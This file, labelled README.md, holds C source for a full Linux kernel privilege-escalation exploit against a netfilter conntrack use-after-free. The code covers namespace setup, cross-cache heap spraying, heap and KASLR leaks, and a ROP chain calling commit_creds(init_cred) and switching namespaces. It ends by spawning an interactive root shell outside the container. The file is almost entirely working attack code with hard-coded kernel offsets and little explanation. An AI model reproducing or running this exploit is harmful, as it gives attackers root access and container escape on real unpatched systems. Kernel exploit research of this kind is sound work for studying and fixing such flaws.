README.md
Rendering markdown...
#include <arpa/inet.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/netfilter_ipv4.h>
#include <net/if.h>
#include <netinet/in.h>
#include <sched.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>
#include "./helpers.h"
#include "./helpers_nfqueue.h"
#define NFT_NOTRACK_OPS 0x1d430a0
#define INIT_NSPROXY 0x2876900
#define COMMIT_CREDS 0x01d4400
#define FIND_TASK_BY_VPID 0x01cab70
#define SWITCH_TASK_NAMESPACES 0x01d2880
#define KPTI_TRAMPOLINE 0x01401190 + 54 // swapgs_restore_regs_and_return_to_usermode + offset
#define INIT_CRED 0x2876b40
#define PUSH_RSI_XCHG_JMP_QWORD_PTR_RSI_F 0x0a5b286 // push rsi ; xchg bx, ax ; jmp QWORD PTR [rsi+0xf]
#define POP_RSP_R13_R14_R15_RET 0x01f1afb // pop rsp ; pop r13 ; pop r14 ; pop r15 ; jmp 0xffffffff8125d450 (smp_call_function_single_async) -> ret
#define POP_RDI_RET 0x00dd45d // pop rdi ; ret
#define POP_RSI_RET 0x026d67e // pop rsi ; ret
#define POP_RDX_RET 0x0228ce2 // pop rdx ; ret
#define MOV_RDI_RAX_MOV_RAX_RDI_POP_RBX_RET 0x0e4620d // mov rdi, rax ; mov rax, rdi ; pop rbx ; jmp 0xffffffff82605040 (__x86_return_thunk) -> ret
#define UDP_PORT 56789
#define QUEUE_NUM 2
// This enum is used by queue points to determine which packet should be queued.
enum signal_for_queue {
SIGNAL_SPRAY, // queue spray packet
SIGNAL_PERCPU_TMPL_NF_CONN, // queue percpu nf_conn packet
SIGNAL_TMP_TMPL_NF_CONN // queue temporary template nf_conn packet
};
#define UDP_HEADER_SIZE 8
#define SLAB_CHUNK_SIZE_256 256
#define IPS_CONFIRMED_BIT 3
// CROSS CACHE PARAMS
#define OBJ_PER_SLAB_256 16
#define CPU_PARTIALS_SLABS_256 7
#define MIN_PARTIAL_256 5
#define CROSS_CACHE_DEFRAGMENTATION_SIZE 200
#define CROSS_CACHE_PRE_PRE_SIZE (OBJ_PER_SLAB_256 * (1 + MIN_PARTIAL_256))
#define CROSS_CACHE_PRE_SIZE (OBJ_PER_SLAB_256)
#define CROSS_CACHE_POST_SIZE (OBJ_PER_SLAB_256 - 1)
#define CROSS_CACHE_POST_POST_SIZE (OBJ_PER_SLAB_256 * (1 + CPU_PARTIALS_SLABS_256))
int spray_cross_cache_defragment[CROSS_CACHE_DEFRAGMENTATION_SIZE];
int spray_cross_cache_pre_pre[CROSS_CACHE_PRE_PRE_SIZE];
int spray_cross_cache_pre[CROSS_CACHE_PRE_SIZE];
int spray_cross_cache_post[CROSS_CACHE_POST_SIZE];
int spray_cross_cache_post_post[CROSS_CACHE_POST_POST_SIZE];
// SPRAY PARAMS
#define SPRAY_BATCHES 32
#define SPRAY_NOT_STRESS_BATCHES 4 // use this instead of SPRAY_BATCHES when the cache has only a few freed chunks
#define SPRAY_BATCH_SIZE 32
// SIZE AND OFFSETS
#define NFT_RULE_SIZE 0x18
#define NFT_EXPR_SIZE 0x8
#define NFT_LOG_SIZE 0x18
#define NFT_USERDATA_OFFS_DATA sizeof(struct nft_userdata)
#define NF_CONN_OFFS_CT_GENERAL 0x0
#define NF_CONN_OFFS_CT_STATUS 0x80
#define NF_CONN_OFFS_CT_NET 0x88
#define NF_CONN_OFFS_NAT_BYSOURCE 0x90
#define NF_CONN_OFFS_EXT 0xb0
#define NET_OFFS_CT 0x9c0
#define NETNS_CT_OFFS_NF_CONNTRACK_EVENT_CB 0x10
#define NFT_EXPR_OPS_OFFS_DEACTIVATE 0x28
// nf_ct_ext
#define NF_CT_EXT_NUM 9
#define NF_CT_EXT_LABELS 7
struct nf_ct_ext {
uint8_t offset[NF_CT_EXT_NUM];
uint8_t len;
unsigned int gen_id;
char data[];
};
#define BATCH_BUFFER_SIZE 1048576 // 1M buffer should be enough
#define NUMBER_OF_NOTRACK_EXPRS 13 // Use 13 notrack expressions as padding to align nft_log.prefix with the UAF write offset.
#define FAKE_EXT_OFFSET (SLAB_CHUNK_SIZE_256 - sizeof(struct nf_ct_ext)) // offset of the fake nf_ct_ext inside chunk 256, place fake ext at the bottom of chunk 256, right before adj nft_rule
#define JOP_OFFSET_FROM_BEGINNING_OF_NFT_RULE 0xc8 // offset 0xc8 of nft_rule <=> expr->ops->deactivate
sock nlsock;
const uint16_t family = NFPROTO_IPV4;
uint64_t user_cs, user_ss, user_rflags, user_sp;
uint64_t leaked_first_tmpl_nf_conn_addr = 0, vmlinux = 0;
char buf[0xffff]; // general purpose buf
// id of the packet in netfilter queue
uint32_t packet_id_first_nf_conn;
uint32_t packet_id_second_nf_conn;
// handle of the nft_rule that re-use the memmory dangling in nf_nat_bysource list (original owned by the first nf_conn)
uint64_t rule_handle_first_nf_conn;
const char base_table[] = "base_table";
const char table_spray_name[] = "table_spray_name";
const char chain_spray_name[] = "chain_spray_name";
void save_state() {
__asm__(".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;");
}
void after_privesc_as_root() {
INFO("Returned to userland");
setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
setns(open("/proc/1/ns/pid", O_RDONLY), 0);
setns(open("/proc/1/ns/net", O_RDONLY), 0);
char *args[] = {"/bin/bash", "-i", NULL};
execve(args[0], args, NULL);
}
void write_to_file(const char *which, const char *format, ...) {
FILE *fu = fopen(which, "w");
va_list args;
va_start(args, format);
if (vfprintf(fu, format, args) < 0) {
ERROR("cannot write");
exit(1);
}
fclose(fu);
}
int loopback_up() {
struct ifreq ifr;
int sockfd;
// Create a socket to perform ioctl operations
sockfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sockfd < 0) {
perror("Socket creation failed");
return 1;
}
// Specify the interface name ("lo" for loopback)
strncpy(ifr.ifr_name, "lo", IFNAMSIZ);
// Get the current flags for the interface
if (ioctl(sockfd, SIOCGIFFLAGS, &ifr) < 0) {
perror("Failed to get interface flags");
close(sockfd);
return 1;
}
// Set the IFF_UP flag to bring the interface up
ifr.ifr_flags |= IFF_UP;
// Apply the new flags to the interface
if (ioctl(sockfd, SIOCSIFFLAGS, &ifr) < 0) {
perror("Failed to set interface flags");
close(sockfd);
return 1;
}
INFO("Loopback interface 'lo' is now up.");
close(sockfd);
return 0;
}
int setup(void) {
uid_t uid = getuid();
gid_t gid = getgid();
// In order to use nf_tables, we need CAP_NET_ADMIN
INFO("Setting up user namespace");
if (unshare(CLONE_NEWUSER | CLONE_NEWNET)) {
ERROR("unshare(CLONE_NEWUSER | CLONE_NEWNET)");
return -1;
}
INFO("Pinning process to CPU #0");
cpu_set_t set;
CPU_ZERO(&set);
CPU_SET(0, &set);
if (sched_setaffinity(getpid(), sizeof(set), &set) < 0) {
ERROR("sched_setaffinity");
return -1;
}
// now we map uid and gid
write_to_file("/proc/self/uid_map", "0 %d 1", uid);
// deny setgroups (see user_namespaces(7))
write_to_file("/proc/self/setgroups", "deny");
// remap gid
write_to_file("/proc/self/gid_map", "0 %d 1", gid);
loopback_up();
return 0;
}
int setup_nft_base_table() {
table t = make_table(base_table, family, NULL, 0);
batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
batch_new_table(b, t, family);
return batch_send_and_run_callbacks(b, nlsock, NULL);
}
int vuln_setup() {
char c_pre_conntrack_name[] = "pre_conntrack_chain";
char c_post_conntrack_name[] = "post_conntrack_chain";
chain c_pre_conntrack = make_chain(base_table, c_pre_conntrack_name, 0, NF_INET_LOCAL_OUT, NF_IP_PRI_CONNTRACK - 1, NULL);
expr e_notrack = make_notrack_expr();
rule r_pre_conntrack = make_rule(base_table, c_pre_conntrack_name, &e_notrack, 1, NULL, 0, 0);
chain c_post_conntrack = make_chain(base_table, c_post_conntrack_name, 0, NF_INET_LOCAL_OUT, NF_IP_PRI_CONNTRACK + 1, NULL);
expr e_ct_set_zone = make_ct_set_zone_expr(NFT_REG32_00);
rule r_post_conntrack = make_rule(base_table, c_post_conntrack_name, &e_ct_set_zone, 1, NULL, 0, 0);
batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
batch_new_chain(b, c_pre_conntrack, family);
batch_new_chain(b, c_post_conntrack, family);
batch_new_rule(b, r_pre_conntrack, family);
batch_new_rule(b, r_post_conntrack, family);
return batch_send_and_run_callbacks(b, nlsock, NULL);
}
int register_base_nat_chain() {
// The hooknum can be any valid Netfilter hook
chain c_nat = make_chain(base_table, "nat_chain", 0, NF_INET_POST_ROUTING, 0, "nat");
batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
batch_new_chain(b, c_nat, family);
return batch_send_and_run_callbacks(b, nlsock, NULL);
}
// Register a chain with a rule that queues packets based on the first byte of their payload
int register_conditional_queue_point(char *chain_name, uint32_t hooknum, uint32_t prio, uint8_t byte_to_compare) {
chain c = make_chain(base_table, chain_name, 0, hooknum, prio, NULL);
expr e_payload = make_payload_expr(NFT_PAYLOAD_TRANSPORT_HEADER, UDP_HEADER_SIZE, 1, NFT_REG32_00);
expr e_cmp = make_cmp_expr(NFT_REG32_00, NFT_CMP_EQ, byte_to_compare);
expr e_queue = make_queue_expr(QUEUE_NUM, 0, 0);
expr list_e[3] = {e_payload, e_cmp, e_queue};
rule r = make_rule(base_table, chain_name, list_e, ARRAY_SIZE(list_e), NULL, 0, 0);
batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
batch_new_chain(b, c, family);
batch_new_rule(b, r, family);
return batch_send_and_run_callbacks(b, nlsock, NULL);
}
void update_labels_to_overwrites_ops() {
char buf[MNL_SOCKET_BUFFER_SIZE];
struct nlmsghdr *nlh;
struct nlattr *nest;
// Release the packet from the "nf_conn_queue_point_2" queue point.
nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, QUEUE_NUM);
nfq_nlmsg_verdict_put(nlh, packet_id_second_nf_conn, NF_ACCEPT);
uint64_t adj_nft_rule_addr = leaked_first_tmpl_nf_conn_addr + SLAB_CHUNK_SIZE_256;
uint64_t fake_ops_addr = adj_nft_rule_addr + JOP_OFFSET_FROM_BEGINNING_OF_NFT_RULE - NFT_EXPR_OPS_OFFS_DEACTIVATE;
uint64_t orig_ops_addr = vmlinux + NFT_NOTRACK_OPS;
uint8_t cta_labels[16] = {0};
uint8_t cta_masks[16] = {0};
*(uint64_t *)&cta_labels[0x0] = fake_ops_addr ^ orig_ops_addr;
nest = mnl_attr_nest_start(nlh, NFQA_CT);
mnl_attr_put(nlh, CTA_LABELS, 16, cta_labels);
mnl_attr_put(nlh, CTA_LABELS_MASK, 16, cta_masks);
mnl_attr_nest_end(nlh, nest);
if (mnl_socket_sendto(nlsock_queue, nlh, nlh->nlmsg_len) < 0) {
perror("mnl_socket_send");
exit(EXIT_FAILURE);
}
// This packet will be stopped at "nf_conn_queue_point_3". Keep it alive to avoid potential errors from it being freed.
}
void send_udp_packet(uint8_t first_byte) {
int sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
struct sockaddr_in addr;
addr.sin_family = AF_INET;
addr.sin_port = htons(UDP_PORT);
addr.sin_addr.s_addr = inet_addr("127.0.0.1");
sendto(sock, &first_byte, 1, 0, (struct sockaddr *)&addr, sizeof(addr));
close(sock);
}
int setup_chain_to_spray_nft_rule() {
table t_spray = make_table(table_spray_name, family, NULL, 0);
chain c_spray = make_chain(table_spray_name, chain_spray_name, 0, -1, 0, NULL);
batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
batch_new_table(b, t_spray, family);
batch_new_chain(b, c_spray, family);
return batch_send_and_run_callbacks(b, nlsock, NULL);
}
int alloc_nf_conn() {
// send a packet to alloc a temporary template nf_conn in the function `nft_ct_set_zone_eval()`
// this template nf_conn stays alive until the user sends a DROP verdict to drop the packet
send_udp_packet(SIGNAL_SPRAY);
int id_in_queue = queue_recv(queue_get_id_cb); // recv the packet at "before_nat_chain" queue point
return id_in_queue;
}
#define FIRST_SPRAY_MIN_RULE_HANDLE 2 // handle for rule used to spray start from 2
#define FIRST_SPRAY_MAX_RULE_HANDLE (SPRAY_BATCHES * SPRAY_BATCH_SIZE + FIRST_SPRAY_MIN_RULE_HANDLE - 1)
int dump_exprs(const struct nlmsghdr *nlh, void *data) {
rule r = nftnl_rule_alloc();
nftnl_rule_nlmsg_parse(nlh, r);
struct nftnl_expr_iter *iter = nftnl_expr_iter_create(r);
// Skip notrack exprs
for (int i = 0; i < NUMBER_OF_NOTRACK_EXPRS; i++)
nftnl_expr_iter_next(iter);
// Retrieve the content of the prefix field
const char *leaked = nftnl_expr_get_str(nftnl_expr_iter_next(iter), NFTNL_EXPR_LOG_PREFIX);
if (leaked) {
leaked_first_tmpl_nf_conn_addr = (*(uint64_t *)leaked) - NF_CONN_OFFS_NAT_BYSOURCE;
INFO("Heap address of the first tmpl nf_conn addr: 0x%lx", leaked_first_tmpl_nf_conn_addr);
}
nftnl_expr_iter_destroy(iter);
nftnl_rule_free(r);
return MNL_CB_OK;
}
int leak_heap_first_tmpl_nf_conn() {
char buf[MNL_SOCKET_BUFFER_SIZE];
rule r;
nlmsghdr hdr;
// One of these rules contains the overwritten prefix. By dumping the prefix field, we leak the heap address of the chunk used by the first template nf_conn.
for (uint64_t handle = FIRST_SPRAY_MIN_RULE_HANDLE; handle <= FIRST_SPRAY_MAX_RULE_HANDLE; handle++) {
r = make_rule(table_spray_name, chain_spray_name, NULL, 0, NULL, 0, handle);
rseq = seq;
hdr = dump_rule(r, buf, family);
nftnl_rule_free(r);
if (mnl_socket_sendto(nlsock, buf, hdr->nlmsg_len) < 0) {
ERROR("mnl_socket_sendto");
return -1;
}
if (run_callbacks(nlsock, dump_exprs, NULL) < 0) {
ERROR("run_callbacks leak_heap: primitive");
return -1;
}
if (leaked_first_tmpl_nf_conn_addr) {
rule_handle_first_nf_conn = handle; // Save the handle of the rule that reclaimed the freed chunk.
return 0;
}
}
return -1;
}
int queue_leak_kaslr_cb(const struct nlmsghdr *nlh, void *data) {
struct nfqnl_msg_packet_hdr *ph = NULL;
char *ct_ext;
struct nlattr *attr[NFQA_MAX + 1] = {};
if (nfq_nlmsg_parse(nlh, attr) < 0) {
perror("problems parsing");
return MNL_CB_ERROR;
}
ph = mnl_attr_get_payload(attr[NFQA_PACKET_HDR]);
ct_ext = mnl_attr_get_payload(attr[NFQA_CT]);
packet_id_second_nf_conn = ntohl(ph->packet_id);
// 0x4c is the offset of the labels data inside the received payload.
// Use a hard-coded offset to quickly retrieve the value.
vmlinux = *(uint64_t *)&ct_ext[0x4c] - NFT_NOTRACK_OPS;
INFO("Leaked vmlinux: 0x%lx", vmlinux);
return MNL_CB_OK;
}
int leak_kaslr() {
// The second template nf_conn is now completely under attacker control.
// Release the packet from the "nf_conn_queue_point_1" queue point.
nfq_send_verdict(QUEUE_NUM, packet_id_second_nf_conn, NF_ACCEPT);
INFO("Try to recv, if exploit gets stuck here, the cross-cache likely didn't hit and the packet was dropped");
queue_recv(queue_leak_kaslr_cb); // recv the packet from "nf_conn_queue_point_2" queue point
return 0;
}
int spray_nft_tables_udata_kmalloc_cg_256_fake_ext() {
int table_spray_counter = 0;
char udata[SLAB_CHUNK_SIZE_256] = {0};
struct nf_ct_ext *fake_nf_ct_ext = (struct nf_ct_ext *)&udata[FAKE_EXT_OFFSET];
fake_nf_ct_ext->offset[NF_CT_EXT_LABELS] = sizeof(struct nf_ct_ext) + NFT_RULE_SIZE; // => labels's offset points to notrack ops inside adjacent nft_rule
fake_nf_ct_ext->len = 0;
fake_nf_ct_ext->gen_id = 0;
for (int i = 0; i < SPRAY_NOT_STRESS_BATCHES; ++i) {
batch b = batch_init(BATCH_BUFFER_SIZE);
for (int j = 0; j < SPRAY_BATCH_SIZE; ++j) {
char table_name[32];
sprintf(table_name, "tsrp-1-%d", table_spray_counter++);
table t = make_table(table_name, family, udata, sizeof(udata));
batch_new_table(b, t, family);
nftnl_table_free(t);
}
if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0)
return -1;
}
return 0;
}
int del_target_rule(uint32_t handle) {
rule r = make_rule(table_spray_name, chain_spray_name, NULL, 0, NULL, 0, handle);
batch b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
batch_del_rule(b, r, family);
return batch_send_and_run_callbacks(b, nlsock, NULL);
}
int update_adjacent_nft_rule_udata_with_ROP() {
// The only way to update the udata of an nft_rule is to free the rule and spray again.
// 1. Free adjacent nft_rule
// Calculate the handle range for the adj nft_rules
int32_t lower_bound_adj_rule_handle = rule_handle_first_nf_conn - (OBJ_PER_SLAB_256 - 1);
lower_bound_adj_rule_handle = lower_bound_adj_rule_handle < FIRST_SPRAY_MIN_RULE_HANDLE ? FIRST_SPRAY_MIN_RULE_HANDLE : lower_bound_adj_rule_handle;
int32_t upper_bound_adj_rule_handle = rule_handle_first_nf_conn + (OBJ_PER_SLAB_256 - 1);
upper_bound_adj_rule_handle = upper_bound_adj_rule_handle > FIRST_SPRAY_MAX_RULE_HANDLE ? FIRST_SPRAY_MAX_RULE_HANDLE : upper_bound_adj_rule_handle;
for (int32_t handle = lower_bound_adj_rule_handle; handle <= upper_bound_adj_rule_handle; handle++) {
if (handle == rule_handle_first_nf_conn)
continue;
del_target_rule(handle);
}
// @sleep(kernel_func="nft_commit_release",
// desc="wait for adjacent nft_rule to be freed")
usleep(100 * 1000);
// 2. Spray nft_rules with udata containing the ROP chain.
const size_t udata_len = SLAB_CHUNK_SIZE_256 - NFT_RULE_SIZE - NFT_EXPR_SIZE - sizeof(struct nft_userdata);
char udata[udata_len];
memset(udata, 0, udata_len);
// the jop gadget jumps to [rsi + 0xf] so we put the stack pivot gadget there
*(uint64_t *)&udata[0xf - NFT_EXPR_SIZE] = vmlinux + POP_RSP_R13_R14_R15_RET;
uint64_t *rop = (uint64_t *)&udata[0x10];
// commit_creds(&init_cred)
*rop++ = vmlinux + POP_RDI_RET;
*rop++ = vmlinux + INIT_CRED;
*rop++ = vmlinux + COMMIT_CREDS;
// switch_task_namespaces(find_task_by_vpid(1), &init_nsproxy)
*rop++ = vmlinux + POP_RDI_RET;
*rop++ = 1;
*rop++ = vmlinux + FIND_TASK_BY_VPID;
*rop++ = vmlinux + MOV_RDI_RAX_MOV_RAX_RDI_POP_RBX_RET;
*rop++ = 0;
*rop++ = vmlinux + POP_RSI_RET;
*rop++ = vmlinux + INIT_NSPROXY;
*rop++ = vmlinux + SWITCH_TASK_NAMESPACES;
// return to userspace
*rop++ = vmlinux + KPTI_TRAMPOLINE;
rop++;
rop++;
*rop++ = (uint64_t)after_privesc_as_root;
*rop++ = user_cs;
*rop++ = user_rflags;
*rop++ = user_sp;
*rop++ = user_ss;
// jop gadget, put here because this space is unused. rsi is pointing to fake_expr
// we can use either of the following, they are equivalent
*rop++ = vmlinux + PUSH_RSI_XCHG_JMP_QWORD_PTR_RSI_F;
// or
#define NFT_RULE_OFFS_NFT_USERDATA (NFT_RULE_SIZE + NFT_EXPR_SIZE)
*(uint64_t *)&udata[JOP_OFFSET_FROM_BEGINNING_OF_NFT_RULE - NFT_RULE_OFFS_NFT_USERDATA] = vmlinux + PUSH_RSI_XCHG_JMP_QWORD_PTR_RSI_F;
// It’s okay to comment out either one of the two.
expr e_notrack = make_notrack_expr(); // The ops of this notrack expression will be overwritten later.
// Because data in struct nft_userdata starts at offset 1, we send udata from offset 1 to keep everything aligned.
rule r = make_rule(table_spray_name, chain_spray_name, &e_notrack, 1, &((struct nft_userdata *)&udata)->data, sizeof(udata) - NFT_USERDATA_OFFS_DATA, 0);
for (int i = 0; i < SPRAY_NOT_STRESS_BATCHES; i++) {
batch b = batch_init(BATCH_BUFFER_SIZE);
for (int j = 0; j < SPRAY_BATCH_SIZE; j++) {
batch_new_rule(b, r, family);
}
if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0)
return -1;
}
return 0;
}
int spray_nft_tables_udata_kmalloc_cg_256_fake_nf_conn() {
int table_spray_counter = 0;
char fake_nf_conn[256] = {0};
*(uint32_t *)(&fake_nf_conn[NF_CONN_OFFS_CT_GENERAL]) = 1; // set refcnt = 1
// set status = CONFIRMED to skip function `__nf_conntrack_update()` in `nf_conntrack_update()`. flow: nfqnl_recv_verdict()->nfqnl_reinject()->nf_conntrack_update()
*(uint64_t *)(&fake_nf_conn[NF_CONN_OFFS_CT_STATUS]) = 1 << IPS_CONFIRMED_BIT;
// prevents null deref at line `rcu_access_pointer(net->ct.nf_conntrack_event_cb)` in `nf_conntrack_event_cache()`
// Just needs to be set to a valid memory address (e.g., leaked_first_tmpl_nf_conn_addr).
*(uint64_t *)(&fake_nf_conn[NF_CONN_OFFS_CT_NET]) = leaked_first_tmpl_nf_conn_addr - (NET_OFFS_CT + NETNS_CT_OFFS_NF_CONNTRACK_EVENT_CB);
// Set ext to point to the fake nf_ct_ext we placed at the bottom of the leaked address chunk.
*(uint64_t *)(&fake_nf_conn[NF_CONN_OFFS_EXT]) = leaked_first_tmpl_nf_conn_addr + FAKE_EXT_OFFSET;
for (int i = 0; i < SPRAY_BATCHES; ++i) {
batch b = batch_init(BATCH_BUFFER_SIZE);
for (int j = 0; j < SPRAY_BATCH_SIZE; ++j) {
char table_name[32];
sprintf(table_name, "tsrp-2-%d", table_spray_counter++);
table t = make_table(table_name, family, fake_nf_conn, sizeof(fake_nf_conn));
batch_new_table(b, t, family);
nftnl_table_free(t);
}
if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0)
return -1;
}
return 0;
}
int escalate() {
batch b;
rule del_rule = make_rule(table_spray_name, chain_spray_name, NULL, 0, NULL, 0, 0);
b = batch_init(MNL_SOCKET_BUFFER_SIZE * 2);
batch_del_rule(b, del_rule, family);
return batch_send_and_run_callbacks(b, nlsock, NULL);
}
void spray_cross_cache_pre_alloc() {
// 1. DEFRAG kmalloc-256
for (int i = 0; i < CROSS_CACHE_DEFRAGMENTATION_SIZE; i++) {
spray_cross_cache_defragment[i] = alloc_nf_conn();
}
// 2. pre pre allocate
for (int i = 0; i < CROSS_CACHE_PRE_PRE_SIZE; i++) {
spray_cross_cache_pre_pre[i] = alloc_nf_conn();
}
// 3. pre allocate
for (int i = 0; i < CROSS_CACHE_PRE_SIZE; i++) {
spray_cross_cache_pre[i] = alloc_nf_conn();
}
}
// alloc target between spray_cross_cache_pre_alloc() and spray_cross_cache_post_alloc()
void spray_cross_cache_post_alloc() {
// 5. post allocate
for (int i = 0; i < CROSS_CACHE_POST_SIZE; i++) {
spray_cross_cache_post[i] = alloc_nf_conn();
}
// 6. post post allocate
for (int i = 0; i < CROSS_CACHE_POST_POST_SIZE; i++) {
spray_cross_cache_post_post[i] = alloc_nf_conn();
}
}
void cross_cache_pre_free() {
// 7. pre pre free
for (int i = 0; i < CROSS_CACHE_PRE_PRE_SIZE; i++) {
nfq_send_verdict(QUEUE_NUM, spray_cross_cache_pre_pre[i], NF_DROP);
}
// 8. pre free
for (int i = 0; i < CROSS_CACHE_PRE_SIZE; i++) {
nfq_send_verdict(QUEUE_NUM, spray_cross_cache_pre[i], NF_DROP);
}
}
// free target between cross_cache_pre_free() and cross_cache_post_free()
void cross_cache_post_free() {
// 9. post free
for (int i = 0; i < CROSS_CACHE_POST_SIZE; i++) {
nfq_send_verdict(QUEUE_NUM, spray_cross_cache_post[i], NF_DROP);
}
// 11. post post free
for (int i = 0; i < CROSS_CACHE_POST_POST_SIZE; i++) {
nfq_send_verdict(QUEUE_NUM, spray_cross_cache_post_post[i], NF_DROP);
}
}
int spray_nft_rule_kmalloc_cg_256() {
const int number_of_exprs = NUMBER_OF_NOTRACK_EXPRS + 1; // + 1 for nft_log expression
int udata_size = SLAB_CHUNK_SIZE_256; // craft a rule in cache 256
udata_size -= NFT_RULE_SIZE;
udata_size -= NFT_EXPR_SIZE * number_of_exprs; // this rule contains NUMBER_OF_NOTRACK_EXPRS expressions, notrack expression doesn't have private data.
udata_size -= NFT_LOG_SIZE; // nft_log expression has private data
udata_size -= sizeof(struct nft_userdata);
char udata[udata_size];
memset(udata, 0, udata_size);
expr list_e[number_of_exprs];
// notrack exprs are used as padding for nft_log
for (int i = 0; i < NUMBER_OF_NOTRACK_EXPRS; i++) {
list_e[i] = make_notrack_expr();
}
expr e_log = make_log_expr(NULL);
list_e[number_of_exprs - 1] = e_log; // nft_log.prefix field is located at offset 0x98 of nft_rule. It matches the offset of the uaf write.
rule r = make_rule(table_spray_name, chain_spray_name, list_e, ARRAY_SIZE(list_e), udata, sizeof(udata), 0);
for (int i = 0; i < SPRAY_BATCHES; i++) {
batch b = batch_init(BATCH_BUFFER_SIZE);
for (int j = 0; j < SPRAY_BATCH_SIZE; j++) {
batch_new_rule(b, r, family);
}
if (batch_send_and_run_callbacks(b, nlsock, NULL) < 0)
return -1;
}
return 0;
}
int setup_netfilter() {
INFO("Creating netfilter netlink socket");
if ((nlsock = mnl_socket_open(NETLINK_NETFILTER)) == NULL) {
ERROR("mnl_socket_open(): nlsock");
return -1;
}
if (mnl_socket_bind(nlsock, 0, MNL_SOCKET_AUTOPID) < 0) {
ERROR("mnl_socket_bind");
return -1;
}
setup_nf_queue();
setup_nft_base_table();
vuln_setup();
// "before_nat_chain" queue point blocks spray packets entering base NAT chain while keeping them alive.
register_conditional_queue_point("before_nat_chain", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC - 1, SIGNAL_SPRAY);
register_base_nat_chain();
// The "nf_conn_queue_point_*" queue point queues two sk_buffs with temporary template nf_conns used to interact with the vulnerability.
register_conditional_queue_point("nf_conn_queue_point_1", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC + 1, SIGNAL_TMP_TMPL_NF_CONN);
register_conditional_queue_point("nf_conn_queue_point_2", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC + 2, SIGNAL_TMP_TMPL_NF_CONN);
register_conditional_queue_point("nf_conn_queue_point_3", NF_INET_POST_ROUTING, NF_IP_PRI_NAT_SRC + 3, SIGNAL_TMP_TMPL_NF_CONN);
// "after_nf_confirm" queue point is used to keep the sk_buff with percpu template nf_conn of nft_ct_zone_eval() alive, allows us to use the temporary nf_conn of nft_ct_zone_eval().
// Note: We can't queue a sk_buff containing an unconfirmed nf_conn with refcount greater than 1, read nf_ct_drop_unconfirmed().
// Register this queue point after `nf_confirm()` function.
register_conditional_queue_point("after_nf_confirm", NF_INET_PRE_ROUTING, NF_IP_PRI_FIRST, SIGNAL_PERCPU_TMPL_NF_CONN);
setup_chain_to_spray_nft_rule();
return 0;
}
int main() {
save_state();
if (setup() == -1)
return -1;
setup_netfilter();
send_udp_packet(SIGNAL_PERCPU_TMPL_NF_CONN); // attach per-cpu template nf_conn to this packet
queue_recv(NULL); // recv the packet from "after_nf_confirm" queue point. Keeping this packet alive keeps the per-CPU template busy, allowing us to use a temporary template nf_conn.
INFO("I: CROSS CACHE: kmalloc-256 (struct nf_conn) -> kmalloc-cg-256 (struct nft_rule)");
spray_cross_cache_pre_alloc();
INFO("Allocate the first template nf_conn + link it to nf_nat_bysource");
send_udp_packet(SIGNAL_TMP_TMPL_NF_CONN); // attach temporary template nf_conn to this packet
packet_id_first_nf_conn = queue_recv(queue_get_id_cb); // recv the packet from "nf_conn_queue_point_1" queue point
spray_cross_cache_post_alloc();
cross_cache_pre_free();
INFO("Drop the packet with the first template nf_conn, leaving a dangling pointer in nf_nat_bysource hash table");
nfq_send_verdict(QUEUE_NUM, packet_id_first_nf_conn, NF_DROP);
cross_cache_post_free();
INFO("Reclaim the first template nf_conn (kmalloc-256) with nft_rule (kmalloc-cg-256)");
spray_nft_rule_kmalloc_cg_256();
INFO("I: end CROSS CACHE");
INFO("II: CROSS CACHE: kmalloc-256 (nf_conn) -> kmalloc-cg-256 (nft_tables->udata)");
spray_cross_cache_pre_alloc();
INFO("Allocate second template nf_conn + link it to nf_nat_bysource => trigger uaf write");
send_udp_packet(SIGNAL_TMP_TMPL_NF_CONN);
packet_id_second_nf_conn = queue_recv(queue_get_id_cb); // recv the packet from "nf_conn_queue_point_1" queue point
leak_heap_first_tmpl_nf_conn();
spray_cross_cache_post_alloc();
cross_cache_pre_free();
// Deleting the nft_rule triggers nft_log_destroy(), which frees nft_log.prefix, currently pointing to the middle of the second template nf_conn.
INFO("Free nft_rule => free second template nf_conn");
del_target_rule(rule_handle_first_nf_conn);
// @sleep(kernel_func="nft_commit_release",
// desc="wait for victim rule to be freed")
usleep(100 * 1000);
INFO("Reclaim freed nft_rule (kmalloc-cg-256) with nft_table.udata (kmalloc-cg-256)");
spray_nft_tables_udata_kmalloc_cg_256_fake_ext();
cross_cache_post_free();
INFO("Reclaim the second template nf_conn (kmalloc-256) with nft_table.udata (kmalloc-cg-256)");
spray_nft_tables_udata_kmalloc_cg_256_fake_nf_conn();
INFO("II: end CROSS CACHE");
leak_kaslr();
update_adjacent_nft_rule_udata_with_ROP();
update_labels_to_overwrites_ops();
escalate();
return 0;
}